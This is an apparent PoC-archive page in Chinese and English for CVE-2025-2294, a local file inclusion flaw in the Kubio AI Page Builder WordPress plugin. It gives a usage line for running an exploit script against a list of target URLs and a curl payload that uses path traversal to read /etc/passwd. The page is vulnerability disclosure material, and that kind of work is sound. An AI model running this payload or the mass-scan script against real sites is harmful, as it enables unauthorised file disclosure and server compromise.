关联漏洞
标题:
WordPress plugin Kubio AI Page Builder 路径遍历漏洞
(CVE-2025-2294)
描述:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin Kubio AI Page Builder 2.5.1及之前版本存在路径遍历漏洞,该漏洞源于kubio_hybrid_theme_load_template函数存在本地文件包含,可能导致未认证攻击者包含和执行任意文件。
介绍
# CVE-2025-2294
# 🚨 CVE-2025-2294 - Local File Inclusion (LFI) Vulnerability in Kubio AI Page Builder for WordPress 🧱
## 🔍 Overview
**CVE-2025-2294** is a critical 🔥 Local File Inclusion (LFI) vulnerability affecting the Kubio AI Page Builder plugin for WordPress (versions up to and including 2.5.1). This flaw allows **unauthenticated remote attackers** 👾 to include arbitrary files on the server via the `__kubio-site-edit-iframe-classic-template` URL parameter.
Exploiting this vulnerability may lead to disclosure of sensitive files 📂, remote code execution 💥, and full system compromise 💀.
## 👤 Author
**Muhammad Nizar** — Security Researcher 🔐
GitHub: [0xWhoami35](https://github.com/0xWhoami35)
YouTube: [InfoSec Insight](https://www.youtube.com/channel/UC33gQFGBqkqDE0zZNwamCgw) ▶️
---
*Feel free to reach out for questions or collaboration! 🤝*
---
## 📋 Affected Versions
- Kubio AI Page Builder plugin ≤ 2.5.1 🛠️
---
## 🧰 Usage
Run the exploit script with a list of target URLs:
```bash
python3 lfi.py -l list.txt
```
## ⚠️ Vulnerability Details
- **Type:** Local File Inclusion (LFI) 🕳️
- **Severity:** Critical (CVSS 9.8) 🔥
- **Attack Vector:** Remote, unauthenticated 🌐
- **Impact:** Confidentiality, Integrity, Availability 🔐
---
## 🧪 Proof of Concept (PoC)
```bash
curl "https://target-website.com/?__kubio-site-edit-iframe-preview=true&__kubio-site-edit-iframe-classic-template=../../../../../../../etc/passwd"
文件快照
[4.0K] /data/pocs/8458218114e7ea1e6481c89a71f567e4ceee0521
├── [4.6K] lfi.py
└── [1.5K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。